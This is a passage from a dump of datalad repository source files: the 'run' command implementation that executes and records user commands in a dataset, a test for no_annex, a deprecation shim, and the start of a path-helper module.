code_cmd=\"\"\"\\\n datalad run -m 'run my script' -i 'data/**/*.dat' \\\\\n -o 'output_dir/**' 'code/script.sh'\"\"\")\n ]\n\n result_renderer = \"tailored\"\n # make run stop immediately on non-success results.\n # this prevents command execution after failure to obtain inputs of prepare\n # outputs. but it can be overriding via the common 'on_failure' parameter\n # if needed.\n on_failure = 'stop'\n\n _params_ = dict(\n cmd=Parameter(\n args=(\"cmd\",),\n nargs=REMAINDER,\n metavar='COMMAND',\n doc=\"\"\"command for execution. A leading '--' can be used to\n disambiguate this command from the preceding options to\n DataLad.\"\"\"),\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"specify the dataset to record the command results in.\n An attempt is made to identify the dataset based on the current\n working directory. If a dataset is given, the command will be\n executed in the root directory of this dataset.\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n inputs=Parameter(\n args=(\"-i\", \"--input\"),\n dest=\"inputs\",\n metavar=(\"PATH\"),\n action='append',\n doc=\"\"\"A dependency for the run. Before running the command, the\n content for this relative path will be retrieved. A value of \".\" means \"run\n :command:`datalad get .`\". The value can also be a glob. [CMD: This\n option can be given more than once. CMD]\"\"\"),\n outputs=Parameter(\n args=(\"-o\", \"--output\"),\n dest=\"outputs\",\n metavar=(\"PATH\"),\n action='append',\n doc=\"\"\"Prepare this relative path to be an output file of the command. A\n value of \".\" means \"run :command:`datalad unlock .`\" (and will fail\n if some content isn't present). For any other value, if the content\n of this file is present, unlock the file. Otherwise, remove it. The\n value can also be a glob. [CMD: This option can be given more than\n once. CMD]\"\"\"),\n expand=Parameter(\n args=(\"--expand\",),\n doc=\"\"\"Expand globs when storing inputs and/or outputs in the\n commit message.\"\"\",\n constraints=EnsureChoice(None, \"inputs\", \"outputs\", \"both\")),\n assume_ready=assume_ready_opt,\n explicit=Parameter(\n args=(\"--explicit\",),\n action=\"store_true\",\n doc=\"\"\"Consider the specification of inputs and outputs to be\n explicit. Don't warn if the repository is dirty, and only save\n modifications to the listed outputs.\"\"\"),\n message=save_message_opt,\n sidecar=Parameter(\n args=('--sidecar',),\n metavar=\"{yes|no}\",\n doc=\"\"\"By default, the configuration variable\n 'datalad.run.record-sidecar' determines whether a record with\n information on a command's execution is placed into a separate\n record file instead of the commit message (default: off). This\n option can be used to override the configured behavior on a\n case-by-case basis. Sidecar files are placed into the dataset's\n '.datalad/runinfo' directory (customizable via the\n 'datalad.run.record-directory' configuration variable).\"\"\",\n constraints=EnsureNone() | EnsureBool()),\n dry_run=Parameter(\n # Leave out common -n short flag to avoid confusion with\n # `containers-run [-n|--container-name]`.\n args=(\"--dry-run\",),\n doc=\"\"\"Do not run the command; just display details about the\n command execution. A value of \"basic\" reports a few important\n details about the execution, including the expanded command and\n expanded inputs and outputs. \"command\" displays the expanded\n command only. Note that input and output globs underneath an\n uninstalled dataset will be left unexpanded because no subdatasets\n will be installed for a dry run.\"\"\",\n constraints=EnsureChoice(None, \"basic\", \"command\")),\n jobs=jobs_opt\n )\n _params_['jobs']._doc += \"\"\"\\\n NOTE: This option can only parallelize input retrieval (get) and output\n recording (save). DataLad does NOT parallelize your scripts for you.\n \"\"\"\n\n @staticmethod\n @datasetmethod(name='run')\n @eval_results\n def __call__(\n cmd=None,\n *,\n dataset=None,\n inputs=None,\n outputs=None,\n expand=None,\n assume_ready=None,\n explicit=False,\n message=None,\n sidecar=None,\n dry_run=None,\n jobs=None):\n for r in run_command(cmd, dataset=dataset,\n inputs=inputs, outputs=outputs,\n expand=expand,\n assume_ready=assume_ready,\n explicit=explicit,\n message=message,\n sidecar=sidecar,\n dry_run=dry_run,\n jobs=jobs):\n yield r\n\n @staticmethod\n def custom_result_renderer(res, **kwargs):\n dry_run = kwargs.get(\"dry_run\")\n if dry_run and \"dry_run_info\" in res:\n if dry_run == \"basic\":\n _display_basic(res)\n elif dry_run == \"command\":\n ui.message(res[\"dry_run_info\"][\"cmd_expanded\"])\n else:\n raise ValueError(f\"Unknown dry-run mode: {dry_run!r}\")\n else:\n if kwargs.get(\"on_failure\") == \"stop\" and \\\n res.get(\"action\") == \"run\" and res.get(\"status\") == \"error\":\n msg_path = res.get(\"msg_path\")\n if msg_path:\n ds_path = res[\"path\"]\n if datalad.get_apimode() == 'python':\n help = f\"\\\"Dataset('{ds_path}').save(path='.', \" \\\n \"recursive=True, message_file='%s')\\\"\"\n else:\n help = \"'datalad save -d . -r -F %s'\"\n lgr.info(\n \"The command had a non-zero exit code. \"\n \"If this is expected, you can save the changes with \"\n f\"{help}\",\n # shorten to the relative path for a more concise\n # message\n Path(msg_path).relative_to(ds_path))\n generic_result_renderer(res)\n\n\ndef _display_basic(res):\n ui.message(ac.color_word(\"Dry run information\", ac.MAGENTA))\n\n def fmt_line(key, value, multiline=False):\n return (\" {key}:{sep}{value}\"\n .format(key=ac.color_word(key, ac.BOLD),\n sep=os.linesep + \" \" if multiline else \" \",\n value=value))\n\n dry_run_info = res[\"dry_run_info\"]\n lines = [fmt_line(\"location\", dry_run_info[\"pwd_full\"])]\n\n # TODO: Inputs and outputs could be pretty long. These may be worth\n # truncating.\n inputs = dry_run_info[\"inputs\"]\n if inputs:\n lines.append(fmt_line(\"expanded inputs\", inputs,\n multiline=True))\n outputs = dry_run_info[\"outputs\"]\n if outputs:\n lines.append(fmt_line(\"expanded outputs\", outputs,\n multiline=True))\n\n cmd = res[\"run_info\"][\"cmd\"]\n cmd_expanded = dry_run_info[\"cmd_expanded\"]\n lines.append(fmt_line(\"command\", cmd, multiline=True))\n if cmd != cmd_expanded:\n lines.append(fmt_line(\"expanded command\", cmd_expanded,\n multiline=True))\n\n ui.message(os.linesep.join(lines))\n\n\ndef get_command_pwds(dataset):\n \"\"\"Return the current directory for the dataset.\n\n Parameters\n ----------\n dataset : Dataset\n\n Returns\n -------\n A tuple, where the first item is the absolute path of the pwd and the\n second is the pwd relative to the dataset's path.\n \"\"\"\n # Follow path resolution logic describe in gh-3435.\n if isinstance(dataset, Dataset): # Paths relative to dataset.\n pwd = dataset.path\n rel_pwd = op.curdir\n else: # Paths relative to current directory.\n pwd = getpwd()\n # Pass pwd to get_dataset_root instead of os.path.curdir to handle\n # repos whose leading paths have a symlinked directory (see the\n # TMPDIR=\"/var/tmp/sym link\" test case).\n if not dataset:\n dataset = get_dataset_root(pwd)\n\n if dataset:\n rel_pwd = op.relpath(pwd, dataset)\n else:\n rel_pwd = pwd # and leave handling to caller\n return pwd, rel_pwd\n\n\ndef _dset_arg_kludge(arg):\n if isinstance(arg, Dataset):\n warnings.warn(\"Passing dataset instance is deprecated; \"\n \"pass path as a string instead\",\n DeprecationWarning)\n arg = arg.path\n return arg\n\n\ndef _is_nonexistent_path(result):\n return (result.get(\"action\") == \"get\" and\n result.get(\"status\") == \"impossible\" and\n result.get(\"message\") == \"path does not exist\")\n\n\ndef _install_and_reglob(dset_path, gpaths):\n \"\"\"Install globbed subdatasets and repeat.\n\n Parameters\n ----------\n dset_path : str\n gpaths : GlobbedPaths object\n\n Returns\n -------\n Generator with the results of the `install` calls.\n \"\"\"\n dset_path = _dset_arg_kludge(dset_path)\n\n def glob_dirs():\n return [d for d in map(op.dirname, gpaths.expand(refresh=True))\n # d could be an empty string because there are relative paths.\n if d]\n\n install = Install()\n dirs, dirs_new = [], glob_dirs()\n while dirs_new and dirs != dirs_new:\n for res in install(dataset=dset_path,\n path=dirs_new,\n result_xfm=None,\n result_renderer='disabled',\n return_type='generator',\n on_failure='ignore'):\n if _is_nonexistent_path(res):\n lgr.debug(\"Skipping install of non-existent path: %s\",\n res[\"path\"])\n else:\n yield res\n dirs, dirs_new = dirs_new, glob_dirs()\n\n\ndef prepare_inputs(dset_path, inputs, extra_inputs=None, jobs=None):\n \"\"\"Prepare `inputs` for running a command.\n\n This consists of installing required subdatasets and getting the input\n files.\n\n Parameters\n ----------\n dset_path : str\n inputs : GlobbedPaths object\n extra_inputs : GlobbedPaths object, optional\n\n Returns\n -------\n Generator with the result records.\n \"\"\"\n dset_path = _dset_arg_kludge(dset_path)\n\n gps = list(filter(bool, [inputs, extra_inputs]))\n if gps:\n lgr.info('Making sure inputs are available (this may take some time)')\n\n get = Get()\n for gp in gps:\n for res in _install_and_reglob(dset_path, gp):\n yield res\n if gp.misses:\n ds = Dataset(dset_path)\n for miss in gp.misses:\n yield get_status_dict(\n action=\"run\", ds=ds, status=\"error\",\n message=(\"Input did not match existing file: %s\",\n miss))\n yield from get(dataset=dset_path,\n path=gp.expand_strict(),\n on_failure='ignore',\n result_renderer='disabled',\n return_type='generator',\n jobs=jobs)\n\n\ndef _unlock_or_remove(dset_path, paths, remove=False):\n \"\"\"Unlock `paths` if content is present; remove otherwise.\n\n Parameters\n ----------\n dset_path : str\n paths : list of string\n Absolute paths of dataset files.\n remove : bool, optional\n If enabled, always remove instead of performing an availability test.\n\n Returns\n -------\n Generator with result records.\n \"\"\"\n dset_path = _dset_arg_kludge(dset_path)\n\n existing = []\n for path in paths:\n if op.exists(path) or op.lexists(path):\n existing.append(path)\n else:\n # Avoid unlock's warning because output files may not exist in\n # common cases (e.g., when rerunning with --onto).\n lgr.debug(\"Filtered out non-existing path: %s\", path)\n\n if not existing:\n return\n\n to_remove = []\n if remove:\n # when we force-remove, we use status to discover matching content\n # and let unlock's remove fallback handle these results\n to_remove = Status()(\n dataset=dset_path,\n path=existing,\n eval_subdataset_state='commit',\n untracked='no',\n annex='no',\n on_failure=\"ignore\",\n # no rendering here, the relevant results are yielded below\n result_renderer='disabled',\n return_type='generator',\n # we only remove files, no subdatasets or directories\n result_filter=lambda x: x.get('type') in ('file', 'symlink'),\n )\n else:\n # Note: If Unlock() is given a directory (including a subdataset)\n # as a path, files without content present won't be reported, so\n # those cases aren't being covered by the \"remove if not present\"\n # logic below.\n for res in Unlock()(dataset=dset_path,\n path=existing,\n on_failure='ignore',\n result_renderer='disabled',\n return_type='generator'):\n if res[\"status\"] == \"impossible\" and res[\"type\"] == \"file\" \\\n and \"cannot unlock\" in res[\"message\"]:\n to_remove.append(res)\n continue\n yield res\n # Avoid `datalad remove` because it calls git-rm underneath, which will\n # remove leading directories if no other files remain. See gh-5486.\n for res in to_remove:\n try:\n os.unlink(res[\"path\"])\n except OSError as exc:\n ce = CapturedException(exc)\n yield dict(res, action=\"run.remove\", status=\"error\",\n message=(\"Removing file failed: %s\", ce),\n exception=ce)\n else:\n yield dict(res, action=\"run.remove\", status=\"ok\",\n message=\"Removed file\")\n\n\ndef normalize_command(command):\n \"\"\"Convert `command` to the string representation.\n \"\"\"\n if isinstance(command, list):\n command = list(map(ensure_unicode, command))\n if len(command) == 1 and command[0] != \"--\":\n # This is either a quoted compound shell command or a simple\n # one-item command. Pass it as is.\n #\n # FIXME: This covers the predominant command-line case, but, for\n # Python API callers, it means values like [\"./script with spaces\"]\n # requires additional string-like escaping, which is inconsistent\n # with the handling of multi-item lists (and subprocess's\n # handling). Once we have a way to detect \"running from Python API\"\n # (discussed in gh-2986), update this.\n command = command[0]\n else:\n if command and command[0] == \"--\":\n # Strip disambiguation marker. Note: \"running from Python API\"\n # FIXME from below applies to this too.\n command = command[1:]\n command = join_cmdline(command)\n else:\n command = ensure_unicode(command)\n return command\n\n\ndef format_command(dset, command, **kwds):\n \"\"\"Plug in placeholders in `command`.\n\n Parameters\n ----------\n dset : Dataset\n command : str or list\n\n `kwds` is passed to the `format` call. `inputs` and `outputs` are converted\n to GlobbedPaths if necessary.\n\n Returns\n -------\n formatted command (str)\n \"\"\"\n command = normalize_command(command)\n sfmt = SequenceFormatter()\n\n for k, v in dset.config.items(\"datalad.run.substitutions\"):\n sub_key = k.replace(\"datalad.run.substitutions.\", \"\")\n if sub_key not in kwds:\n kwds[sub_key] = v\n\n for name in [\"inputs\", \"outputs\"]:\n io_val = kwds.pop(name, None)\n if not isinstance(io_val, GlobbedPaths):\n io_val = GlobbedPaths(io_val, pwd=kwds.get(\"pwd\"))\n kwds[name] = list(map(quote_cmdlinearg, io_val.expand(dot=False)))\n return sfmt.format(command, **kwds)\n\n\ndef _get_substitutions(dset):\n \"\"\"Get substitution mapping\n\n Parameters\n ----------\n dset : Dataset\n Providing the to-be-queried configuration.\n\n Returns\n -------\n dict\n Mapping substitution keys to their values.\n \"\"\"\n return {\n k.replace(\"datalad.run.substitutions.\", \"\"): v\n for k, v in dset.config.items(\"datalad.run.substitutions\")\n }\n\n\ndef _format_iospecs(specs, **kwargs):\n \"\"\"Expand substitutions in specification lists.\n\n The expansion is generally a format() call on each items, using\n the kwargs as substitution mapping. A special case is, however,\n a single-item specification list that exclusively contains a\n plain substitution reference, i.e., ``{subst}``, that matches\n a kwargs-key (minus the brace chars), whose value is a list.\n In this case the entire specification list is substituted for\n the list in kwargs, which is returned as such. This enables\n the replace/re-use sequences, e.g. --inputs '{outputs}'\n\n Parameters\n ----------\n specs: list(str) or None\n Specification items to format.\n **kwargs:\n Placeholder key-value mapping to apply to specification items.\n\n Returns\n -------\n list\n All formatted items.\n \"\"\"\n if not specs:\n return\n elif len(specs) == 1 and specs[0] \\\n and specs[0][0] == '{' and specs[0][-1] == '}' \\\n and isinstance(kwargs.get(specs[0][1:-1]), list):\n return kwargs[specs[0][1:-1]]\n return [\n s.format(**kwargs) for s in specs\n ]\n\n\ndef _execute_command(command, pwd):\n from datalad.cmd import WitlessRunner\n\n exc = None\n cmd_exitcode = None\n runner = WitlessRunner(cwd=pwd)\n try:\n lgr.info(\"== Command start (output follows) =====\")\n runner.run(\n # command is always a string\n command\n )\n except CommandError as e:\n exc = e\n cmd_exitcode = e.code\n lgr.info(\"== Command exit (modification check follows) =====\")\n return cmd_exitcode or 0, exc\n\n\ndef _prep_worktree(ds_path, pwd, globbed,\n assume_ready=None, remove_outputs=False,\n rerun_outputs=None,\n jobs=None):\n \"\"\"\n Yields\n ------\n dict\n Result records\n \"\"\"\n # ATTN: For correct path handling, all dataset commands call should be\n # unbound. They should (1) receive a string dataset argument, (2) receive\n # relative paths, and (3) happen within a chpwd(pwd) context.\n with chpwd(pwd):\n for res in prepare_inputs(\n ds_path,\n [] if assume_ready in [\"inputs\", \"both\"]\n else globbed['inputs'],\n # Ignore --assume-ready for extra_inputs. It's an unexposed\n # implementation detail that lets wrappers sneak in inputs.\n extra_inputs=globbed['extra_inputs'],\n jobs=jobs):\n yield res\n\n if assume_ready not in [\"outputs\", \"both\"]:\n if globbed['outputs']:\n for res in _install_and_reglob(\n ds_path, globbed['outputs']):\n yield res\n for res in _unlock_or_remove(\n ds_path,\n globbed['outputs'].expand_strict()\n if not remove_outputs\n # when force-removing, exclude declared inputs\n else set(\n globbed['outputs'].expand_strict()).difference(\n globbed['inputs'].expand_strict()),\n remove=remove_outputs):\n yield res\n\n if rerun_outputs is not None:\n for res in _unlock_or_remove(ds_path, rerun_outputs):\n yield res\n\n\ndef _create_record(run_info, sidecar_flag, ds):\n \"\"\"\n Returns\n -------\n str or None, str or None\n The first value is either the full run record in JSON serialized form,\n or content-based ID hash, if the record was written to a file. In that\n latter case, the second value is the path to the record sidecar file,\n or None otherwise.\n \"\"\"\n record = json.dumps(run_info, indent=1, sort_keys=True, ensure_ascii=False)\n if sidecar_flag is None:\n use_sidecar = ds.config.get(\n 'datalad.run.record-sidecar', default=False)\n use_sidecar = anything2bool(use_sidecar)\n else:\n use_sidecar = sidecar_flag\n\n record_id = None\n record_path = None\n if use_sidecar:\n # record ID is hash of record itself\n from hashlib import md5\n record_id = md5(record.encode('utf-8')).hexdigest() # nosec\n record_dir = ds.config.get(\n 'datalad.run.record-directory',\n default=op.join('.datalad', 'runinfo'))\n record_path = ds.pathobj / record_dir / record_id\n if not op.lexists(record_path):\n # go for compression, even for minimal records not much difference,\n # despite offset cost\n # wrap in list -- there is just one record\n dump2stream([run_info], record_path, compressed=True)\n return record_id or record, record_path\n\n\ndef run_command(cmd, dataset=None, inputs=None, outputs=None, expand=None,\n assume_ready=None, explicit=False, message=None, sidecar=None,\n dry_run=False, jobs=None,\n extra_info=None,\n rerun_info=None,\n extra_inputs=None,\n rerun_outputs=None,\n inject=False,\n parametric_record=False,\n remove_outputs=False,\n skip_dirtycheck=False,\n yield_expanded=None):\n \"\"\"Run `cmd` in `dataset` and record the results.\n\n `Run.__call__` is a simple wrapper over this function. Aside from backward\n compatibility kludges, the only difference is that `Run.__call__` doesn't\n expose all the parameters of this function. The unexposed parameters are\n listed below.\n\n Parameters\n ----------\n extra_info : dict, optional\n Additional information to dump with the json run record. Any value\n given here will take precedence over the standard run key. Warning: To\n avoid collisions with future keys added by `run`, callers should try to\n use fairly specific key names and are encouraged to nest fields under a\n top-level \"namespace\" key (e.g., the project or extension name).\n rerun_info : dict, optional\n Record from a previous run. This is used internally by `rerun`.\n extra_inputs : list, optional\n Inputs to use in addition to those specified by `inputs`. Unlike\n `inputs`, these will not be injected into the {inputs} format field.\n rerun_outputs : list, optional\n Outputs, in addition to those in `outputs`, determined automatically\n from a previous run. This is used internally by `rerun`.\n inject : bool, optional\n Record results as if a command was run, skipping input and output\n preparation and command execution. In this mode, the caller is\n responsible for ensuring that the state of the working tree is\n appropriate for recording the command's results.\n parametric_record : bool, optional\n If enabled, substitution placeholders in the input/output specification\n are retained verbatim in the run record. This enables using a single\n run record for multiple different re-runs via individual\n parametrization.\n remove_outputs : bool, optional\n If enabled, all declared outputs will be removed prior command\n execution, except for paths that are also declared inputs.\n skip_dirtycheck : bool, optional\n If enabled, a check for dataset modifications is unconditionally\n disabled, even if other parameters would indicate otherwise. This\n can be used by callers that already performed analog verififcations\n to avoid duplicate processing.\n yield_expanded : {'inputs', 'outputs', 'both'}, optional\n Include a 'expanded_%s' item into the run result with the exanded list\n of paths matching the inputs and/or outputs specification,\n respectively.\n\n\n Yields\n ------\n Result records for the run.\n \"\"\"\n if not cmd:\n lgr.warning(\"No command given\")\n return\n\n specs = {\n k: ensure_list(v) for k, v in (('inputs', inputs),\n ('extra_inputs', extra_inputs),\n ('outputs', outputs))\n }\n\n rel_pwd = rerun_info.get('pwd') if rerun_info else None\n if rel_pwd and dataset:\n # recording is relative to the dataset\n pwd = op.normpath(op.join(dataset.path, rel_pwd))\n rel_pwd = op.relpath(pwd, dataset.path)\n else:\n pwd, rel_pwd = get_command_pwds(dataset)\n\n ds = require_dataset(\n dataset, check_installed=True,\n purpose='track command outcomes')\n ds_path = ds.path\n\n lgr.debug('tracking command output underneath %s', ds)\n\n # skip for callers that already take care of this\n if not (skip_dirtycheck or rerun_info or inject):\n # For explicit=True, we probably want to check whether any inputs have\n # modifications. However, we can't just do is_dirty(..., path=inputs)\n # because we need to consider subdatasets and untracked files.\n # MIH: is_dirty() is gone, but status() can do all of the above!\n if not explicit and ds.repo.dirty:\n yield get_status_dict(\n 'run',\n ds=ds,\n status='impossible',\n message=(\n 'clean dataset required to detect changes from command; '\n 'use `datalad status` to inspect unsaved changes'))\n return\n\n # everything below expects the string-form of the command\n cmd = normalize_command(cmd)\n # pull substitutions from config\n cmd_fmt_kwargs = _get_substitutions(ds)\n # amend with unexpanded dependency/output specifications, which might\n # themselves contain substitution placeholder\n for n, val in specs.items():\n if val:\n cmd_fmt_kwargs[n] = val\n\n # apply the substitution to the IO specs\n expanded_specs = {\n k: _format_iospecs(v, **cmd_fmt_kwargs) for k, v in specs.items()\n }\n # try-expect to catch expansion issues in _format_iospecs() which\n # expands placeholders in dependency/output specification before\n # globbing\n try:\n globbed = {\n k: GlobbedPaths(\n v,\n pwd=pwd,\n expand=expand in (\n # extra_inputs follow same expansion rules as `inputs`.\n [\"both\"] + (['outputs'] if k == 'outputs' else ['inputs'])\n ))\n for k, v in expanded_specs.items()\n }\n except KeyError as exc:\n yield get_status_dict(\n 'run',\n ds=ds,\n status='impossible',\n message=(\n 'input/output specification has an unrecognized '\n 'placeholder: %s', exc))\n return\n\n if not (inject or dry_run):\n yield from _prep_worktree(\n ds_path, pwd, globbed,\n assume_ready=assume_ready,\n remove_outputs=remove_outputs,\n rerun_outputs=rerun_outputs,\n jobs=None)\n else:\n # If an inject=True caller wants to override the exit code, they can do\n # so in extra_info.\n cmd_exitcode = 0\n exc = None\n\n # prepare command formatting by extending the set of configurable\n # substitutions with the essential components\n cmd_fmt_kwargs.update(\n pwd=pwd,\n dspath=ds_path,\n # Check if the command contains \"{tmpdir}\" to avoid creating an\n # unnecessary temporary directory in most but not all cases.\n tmpdir=mkdtemp(prefix=\"datalad-run-\") if \"{tmpdir}\" in cmd else \"\",\n # the following override any matching non-glob substitution\n # values\n inputs=globbed['inputs'],\n outputs=globbed['outputs'],\n )\n try:\n cmd_expanded = format_command(ds, cmd, **cmd_fmt_kwargs)\n except KeyError as exc:\n yield get_status_dict(\n 'run',\n ds=ds,\n status='impossible',\n message=('command has an unrecognized placeholder: %s',\n exc))\n return\n\n # amend commit message with `run` info:\n # - pwd if inside the dataset\n # - the command itself\n # - exit code of the command\n run_info = {\n 'cmd': cmd,\n # rerun does not handle any prop being None, hence all\n # the `or/else []`\n 'chain': rerun_info[\"chain\"] if rerun_info else [],\n }\n # for all following we need to make sure that the raw\n # specifications, incl. any placeholders make it into\n # the run-record to enable \"parametric\" re-runs\n # ...except when expansion was requested\n for k, v in specs.items():\n run_info[k] = globbed[k].paths \\\n if expand in [\"both\"] + (\n ['outputs'] if k == 'outputs' else ['inputs']) \\\n else (v if parametric_record\n else expanded_specs[k]) or []\n\n if rel_pwd is not None:\n # only when inside the dataset to not leak information\n run_info['pwd'] = rel_pwd\n if ds.id:\n run_info[\"dsid\"] = ds.id\n if extra_info:\n run_info.update(extra_info)\n\n if dry_run:\n yield get_status_dict(\n \"run [dry-run]\", ds=ds, status=\"ok\", message=\"Dry run\",\n run_info=run_info,\n dry_run_info=dict(\n cmd_expanded=cmd_expanded,\n pwd_full=pwd,\n **{k: globbed[k].expand() for k in ('inputs', 'outputs')},\n )\n )\n return\n\n if not inject:\n cmd_exitcode, exc = _execute_command(cmd_expanded, pwd)\n run_info['exit'] = cmd_exitcode\n\n # Re-glob to capture any new outputs.\n #\n # TODO: If a warning or error is desired when an --output pattern doesn't\n # have a match, this would be the spot to do it.\n if explicit or expand in [\"outputs\", \"both\"]:\n # also for explicit mode we have to re-glob to be able to save all\n # matching outputs\n globbed['outputs'].expand(refresh=True)\n if expand in [\"outputs\", \"both\"]:\n run_info[\"outputs\"] = globbed['outputs'].paths\n\n # create the run record, either as a string, or written to a file\n # depending on the config/request\n record, record_path = _create_record(run_info, sidecar, ds)\n\n # abbreviate version of the command for illustrative purposes\n cmd_shorty = _format_cmd_shorty(cmd_expanded)\n\n # compose commit message\n msg = u\"\"\"\\\n[DATALAD RUNCMD] {}\n\n=== Do not change lines below ===\n{}\n^^^ Do not change lines above ^^^\n\"\"\"\n msg = msg.format(\n message if message is not None else cmd_shorty,\n '\"{}\"'.format(record) if record_path else record)\n\n outputs_to_save = globbed['outputs'].expand_strict() if explicit else None\n if outputs_to_save is not None and record_path:\n outputs_to_save.append(record_path)\n do_save = outputs_to_save is None or outputs_to_save\n msg_path = None\n if not rerun_info and cmd_exitcode:\n if do_save:\n repo = ds.repo\n # must record path to be relative to ds.path to meet\n # result record semantics (think symlink resolution, etc)\n msg_path = ds.pathobj / \\\n repo.dot_git.relative_to(repo.pathobj) / \"COMMIT_EDITMSG\"\n msg_path.write_text(msg)\n\n expected_exit = rerun_info.get(\"exit\", 0) if rerun_info else None\n if cmd_exitcode and expected_exit != cmd_exitcode:\n status = \"error\"\n else:\n status = \"ok\"\n\n run_result = get_status_dict(\n \"run\", ds=ds,\n status=status,\n # use the abbrev. command as the message to give immediate clarity what\n # completed/errors in the generic result rendering\n message=cmd_shorty,\n run_info=run_info,\n # use the same key that `get_status_dict()` would/will use\n # to record the exit code in case of an exception\n exit_code=cmd_exitcode,\n exception=exc,\n # Provide msg_path and explicit outputs so that, under\n # on_failure='stop', callers can react to a failure and then call\n # save().\n msg_path=str(msg_path) if msg_path else None,\n )\n if record_path:\n # we the record is in a sidecar file, report its ID\n run_result['record_id'] = record\n for s in ('inputs', 'outputs'):\n # this enables callers to further inspect the outputs without\n # performing globbing again. Together with remove_outputs=True\n # these would be guaranteed to be the outcome of the executed\n # command. in contrast to `outputs_to_save` this does not\n # include aux file, such as the run record sidecar file.\n # calling .expand_strict() again is largely reporting cached\n # information\n # (format: relative paths)\n if yield_expanded in (s, 'both'):\n run_result[f'expanded_{s}'] = globbed[s].expand_strict()\n yield run_result\n\n if do_save:\n with chpwd(pwd):\n for r in Save.__call__(\n dataset=ds_path,\n path=outputs_to_save,\n recursive=True,\n message=msg,\n jobs=jobs,\n return_type='generator',\n # we want this command and its parameterization to be in full\n # control about the rendering of results, hence we must turn\n # off internal rendering\n result_renderer='disabled',\n on_failure='ignore'):\n yield r\n" }, { "alpha_fraction": 0.574449360370636, "alphanum_fraction": 0.5867841243743896, "avg_line_length": 31.898550033569336, "blob_id": "304cea694168a1516c9fc048a1089c762c69de9b", "content_id": "12ac82223624e3a15b8864e66c829341fa6a31c7", "detected_licenses": [ "BSD-3-Clause", "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2270, "license_type": "permissive", "max_line_length": 100, "num_lines": 69, "path": "/datalad/local/tests/test_no_annex.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# -*- coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test no_annex\"\"\"\n\n\nfrom os.path import join as opj\n\nfrom datalad.api import (\n create,\n no_annex,\n)\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_repo_status,\n create_tree,\n eq_,\n known_failure_githubci_win,\n with_tempfile,\n)\nfrom datalad.utils import Path\n\n\n@known_failure_githubci_win\n@with_tempfile(mkdir=True)\ndef test_no_annex(path=None):\n ds = create(path)\n assert_repo_status(ds.path)\n create_tree(\n ds.path,\n {'code': {\n 'inannex': 'content',\n 'notinannex': 'othercontent'},\n 'README': 'please'})\n # add inannex pre configuration\n ds.save(opj('code', 'inannex'))\n no_annex(pattern=['code/**', 'README'], dataset=ds.path)\n\n inannex = (ds.pathobj / 'code' / 'inannex')\n\n # add inannex and README post configuration\n ds.save([opj('code', 'notinannex'), 'README'])\n\n repo = ds.repo\n try:\n assert_repo_status(ds.path)\n except AssertionError:\n # If on an adjusted branch and notinannex's mtime is as recent or newer\n # than .git/index's, the clean filter runs on it when save() is called.\n # This leads to a racy failure until after git-annex's 424bef6b6\n # (smudge: check for known annexed inodes before checking\n # annex.largefiles, 2021-05-03).\n #\n # https://git-annex.branchable.com/forum/one-off_unlocked_annex_files_that_go_against_large/\n if repo.is_managed_branch() and repo.git_annex_version <= \"8.20210428\":\n assert_repo_status(ds.path, modified=[inannex])\n raise SkipTest(\"Known bug fixed in git-annex\")\n raise\n\n # one is annex'ed, the other is not, despite no change in add call\n # importantly, also .gitattribute is not annexed\n eq_([opj('code', 'inannex')],\n [str(Path(p)) for p in repo.get_annexed_files()])\n" }, { "alpha_fraction": 0.7423076629638672, "alphanum_fraction": 0.7423076629638672, "avg_line_length": 27.88888931274414, "blob_id": "44b0b42cf2f5f096cfaa2b3f83759da4b6af4d29", "content_id": "b482b9840139b179c1f01496a25ea2a6f583f435", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 260, "license_type": "permissive", "max_line_length": 75, "num_lines": 9, "path": "/datalad/plugin/addurls.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "import warnings\n\nwarnings.warn(\n \"datalad.plugin.addurls is deprecated and will be removed in a future \"\n \"release. \"\n \"Use the module from its new location datalad.local.addurls instead.\",\n DeprecationWarning)\n\nfrom datalad.local.addurls import *\n" }, { "alpha_fraction": 0.6200579404830933, "alphanum_fraction": 0.6220207214355469, "avg_line_length": 36.93971633911133, "blob_id": "c3828a6e9e8384150ddbd5983b47a1033f665fde", "content_id": "d5760c2d9211104051b8f2621b99d77dadea0a76", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10699, "license_type": "permissive", "max_line_length": 124, "num_lines": 282, "path": "/datalad/support/path.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Helper functionality and overloads for paths treatment\n\nOne of the reasons is also to robustify operation with unicode filenames\n\"\"\"\nfrom __future__ import annotations\n\n# TODO: RF and move all paths related functions from datalad.utils in here\nimport os\nimport os.path as op\n# to not pollute API importing as _\nfrom collections import defaultdict as _defaultdict\nfrom collections.abc import (\n Iterable,\n Iterator,\n)\nfrom functools import wraps\nfrom itertools import dropwhile\nfrom pathlib import (\n Path,\n PurePosixPath,\n)\n\nfrom ..utils import (\n ensure_bytes,\n getpwd,\n)\n\n\ndef _get_unicode_robust_version(f):\n\n @wraps(f)\n def wrapped(*args, **kwargs):\n try:\n return f(*args, **kwargs)\n except UnicodeEncodeError:\n return f(ensure_bytes(*args, **kwargs))\n doc = 